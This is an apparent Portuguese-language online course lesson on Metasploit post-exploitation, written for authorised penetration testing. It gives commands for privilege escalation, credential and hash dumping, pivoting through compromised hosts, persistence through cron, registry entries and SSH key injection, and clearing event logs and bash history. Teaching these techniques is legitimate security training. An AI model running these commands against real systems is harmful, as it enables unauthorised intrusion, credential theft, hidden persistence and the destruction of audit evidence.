Cyber Security Academy · Aula

Pós-Exploração: Pivotar e Persistir

Use os módulos de pós-exploração do Metasploit para escalonamento de privilégios, extração de credenciais e persistência.

Aula 4 de 413 etapas

Pós-Exploração: Pivotar e Persistir é uma aula grátis de Cyber Security Academy no CoddyKit. Esta é a aula 4 de 4. Você pode ler a aula completa abaixo gratuitamente — depois pratica ao vivo no navegador com um editor de código integrado e um tutor de IA 24/7. Faz parte do caminho de aprendizado de Cyber Security Academy, e seu progresso é sincronizado entre a web e o app CoddyKit. O curso de Cyber Security Academy inclui 4 aulas no total.

Objetivos da pós-exploração

Após o acesso inicial, os objetivos do invasor são: elevar privilégios, coletar informações, manter o acesso persistente e mover-se lateralmente para alcançar o verdadeiro objetivo (dados, sistemas ou controle do domínio).

Consciência situacional

Os primeiros passos após obter acesso ao console são entender onde você está. Colete informações do sistema, configuração de rede, privilégios do usuário atual, processos em execução e variáveis de ambiente.

meterpreter > sysinfo
meterpreter > getuid
meterpreter > getpid
meterpreter > run post/multi/recon/local_exploit_suggester
meterpreter > run post/linux/gather/enum_system

Elevação de privilégios

A elevação local de privilégios passa de um console com poucos privilégios para root/SYSTEM. O local_exploit_suggester do Metasploit identifica explorações locais e do núcleo aplicáveis com base na versão do OS de destino.

meterpreter > run post/multi/recon/local_exploit_suggester

# Identifies applicable exploits
# Then:
msf6 > use exploit/linux/local/cve_2021_4034_pwnkit
msf6 > set SESSION 1
msf6 > run

Coleta de credenciais

Reúna credenciais: senhas com hash, credenciais em texto simples nos arquivos de configuração, senhas salvas no navegador e chaves SSH. Elas permitem o movimento lateral e a persistência.

meterpreter > run post/linux/gather/hashdump
meterpreter > run post/windows/gather/credentials/credential_collector
meterpreter > run post/multi/gather/ssh_creds

# Check env vars for cleartext creds:
meterpreter > run post/multi/gather/env

Pivoteamento: encaminhamento de portas

O pivoteamento usa um host comprometido como ponte para alcançar redes internas isoladas. O portfwd do Metasploit cria encaminhamentos de portas locais por meio da sessão do Meterpreter.

# Forward local port 3306 to internal DB
meterpreter > portfwd add -l 3306 -p 3306 -r 10.10.10.20

# Now connect locally:
mysql -h 127.0.0.1 -P 3306 -u root

Roteamento por meio de sessões

O módulo de rotas do Metasploit adiciona rotas de rede por meio de uma sessão, permitindo que outros módulos alcancem redes acessíveis somente pelo host usado como pivô.

msf6 > route add 10.10.10.0/24 1   # route via session 1
msf6 > route print

# Now run modules targeting 10.10.10.x
# through session 1 as pivot

Pivoteamento com proxy SOCKS

Um proxy SOCKS pelo Metasploit (ou chisel/ssh -D) permite rotear ferramentas arbitrárias pelo pivô usando proxychains — possibilitando que nmap, curl e navegadores alcancem redes internas.

# Set up SOCKS proxy through session
msf6 > use auxiliary/server/socks_proxy
msf6 > set SRVPORT 1080
msf6 > set VERSION 5
msf6 > run -j

# Route tools through proxy
proxychains nmap -sT 10.10.10.0/24

Mecanismos de persistência

A persistência garante que o acesso sobreviva a reinicializações e à perda da sessão. Métodos comuns: tarefas do cron (Linux), chaves de execução do registro (Windows), injeção de chaves authorized_keys do SSH e instalação de serviços.

# Linux: cron-based persistence
meterpreter > run post/linux/manage/cron_persistence

# Windows: registry
meterpreter > run post/windows/manage/persistence_exe

# SSH key injection
echo "ssh-rsa AAAA..." >> /root/.ssh/authorized_keys

Apagando rastros

Os invasores limpam registros para manter o sigilo. Observação de segurança: as soluções modernas de SIEM e EDR enviam registros para fora do host em tempo real — limpar os registros locais não apaga os registros centralizados.

meterpreter > clearev          # clear Windows event logs

# Linux: clear bash history
unset HISTFILE
cat /dev/null > ~/.bash_history

Módulos de pós-exploração

O Metasploit inclui centenas de módulos de pós-exploração para Windows e Linux: coleta de credenciais, dados do navegador, captura de teclas, captura de telas e enumeração de rede.

msf6 > use post/windows/gather/enum_logged_on_users
msf6 > use post/multi/gather/browser_history
msf6 > use post/windows/gather/screen_spy
msf6 > set SESSION 1
msf6 > run

Sabendo quando parar

Em testes de invasão autorizados, pare quando alcançar o objetivo de escopo acordado ou encontrar dados aos quais não está autorizado a ter acesso. Documente cuidadosamente seu caminho — essa é a cadeia de ataque que você relatará.

Verificação rápida

O que o comando "route add" do Metasploit permite fazer?

Resumo: pós-exploração

A pós-exploração baseia-se no acesso inicial para alcançar um impacto real: elevação de privilégios, coleta de credenciais, movimento lateral e persistência. O Metasploit fornece módulos de pós-exploração para cada fase. Documente cada etapa — a cadeia de ataque, da entrada ao objetivo, é o principal resultado entregue em um teste de invasão.

Grátis para começar

Aprenda Cyber Security Academy com um tutor de IA — grátis

Escreva e execute código real no seu navegador, obtenha ajuda instantânea de um tutor de IA 24/7 e continue de onde parou na web ou no app.

Cursos
76
Aulas
303

Perguntas Frequentes

A aula “Pós-Exploração: Pivotar e Persistir” é grátis?

Sim — o texto completo de “Pós-Exploração: Pivotar e Persistir” é grátis para ler aqui na web. Para praticá-la interativamente (um editor de código integrado e um tutor de IA 24/7) e desbloquear o restante do curso de Cyber Security Academy, atualize para CoddyKit PRO. O curso de Cyber Security Academy inclui 4 aulas no total.

O que vou aprender em “Pós-Exploração: Pivotar e Persistir”?

Use os módulos de pós-exploração do Metasploit para escalonamento de privilégios, extração de credenciais e persistência. Você pratica Cyber Security Academy com código prático que executa diretamente no navegador, e um tutor de IA 24/7 responde suas dúvidas enquanto trabalha na aula.

Preciso ter experiência prévia para começar Cyber Security Academy?

Nenhuma experiência prévia é necessária. Cyber Security Academy no CoddyKit é estruturado para alunos iniciantes até avançados, então você pode começar aqui ou desde o início e aprender no seu ritmo. Esta é a aula 4 de 4.

Quanto tempo leva a aula “Pós-Exploração: Pivotar e Persistir”?

A maioria das aulas CoddyKit leva cerca de 5–10 minutos. Cada uma é compacta e interativa, então você faz progresso constante e retoma exatamente de onde parou entre web e app.

Posso escrever e executar código nesta aula de Cyber Security Academy?

Sim. Cada aula de Cyber Security Academy inclui um editor de código integrado, então você escreve e executa código real direto no navegador e recebe feedback de IA instantaneamente — nenhuma configuração local necessária.

Todas as aulas deste curso

  1. Arquitetura do Metasploit e msfconsole
  2. Exploração de uma Vulnerabilidade Conhecida
  3. Cargas: em Estágios ou sem Estágios, Meterpreter
  4. Pós-Exploração: Pivotar e Persistir
← Voltar para Cyber Security Academy